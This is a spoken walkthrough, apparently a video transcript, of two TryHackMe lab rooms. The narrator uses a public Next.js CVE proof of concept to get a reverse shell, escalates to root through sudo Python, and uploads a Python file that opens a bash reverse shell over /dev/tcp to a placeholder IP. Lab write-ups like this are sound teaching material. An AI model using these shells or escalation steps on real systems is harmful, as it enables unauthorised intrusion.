Okay, doing Corp website. This one I had to connect up my Kali box. I was just having issues trying to get the CVE proof of concept to work under the attack box. I'll show you the commands that I used to install the package. But firstly, this is the exploit that we want to grab, the next.js, and I'll put the URL in the comments, but we want to clone this GitHub. So grab the address. I've already cloned it, but we might as well just go through the steps. Git clone, that's already in there. So we clone it. We can see the installation instructions. We need UV sync to install packages. Then we've got our command there. My Kali doesn't have UV installed on it, so the command to grab that was to curl it from their install website. So you'd run that. I've already installed it. That would then grab UV for you. Then you'd do UV sync. It would install all these packages. Then we put it in their environment. And we would then confirm that our exploit's working. This is all on the proof of concept. Sorry, I'll have to copy that again. Okay, we've got ID results back, so it is working. So now we can open up a remote shell. I've got the command listed here. It is just copied from the proof of concept. Okay, it opens up a listener, sending the payload. Okay, it didn't go through. Oh, I cut off. Sorry, my mistake. I cut off the important part. I tried to have everything prepped in the notepad. I apologize. There you go. So I'll do that again. So need to use double enters to get anything to go through. We've logged in. We've got a remote shell as Daniel. Cat user.text. Oh, cd/home/Daniel. Cat user.text. That gives us our first user flag. And then always for privesc, we always look to see what sudo is available, and it looks like they've got Python available as root. So then we can run this command here. So we're going to get a root shell. So we're root. So you need to double enter everything, it's rather annoying. And that gives us our flag for root. And just confirm we are logged in as root. So that's how we solve Corp website. Alright. hope everyone can copy along with that one. As I said, I had issues getting the proof of concept exploit to run on the attack box. So if you are using the TryHackMe attack box, I don't know, I gave up. So I just went to my Kali VM. I'm sure it's possible, but I was having issues with the Python version. Anyway, on to the next one. Okay, we're on to speed chat. We're given this URL. It's the chat room. We get given the option to upload a file. I've put in a shell. Can we see here? Import os.system bash-c bash-i /dev/tcp/myip and port, and then we start a listener, upload that file, named it pwn.py for Python, upload. We can see we've got a remote shell, and if we look in the directory, we've got our flag listed there. Oh. Alright, next one.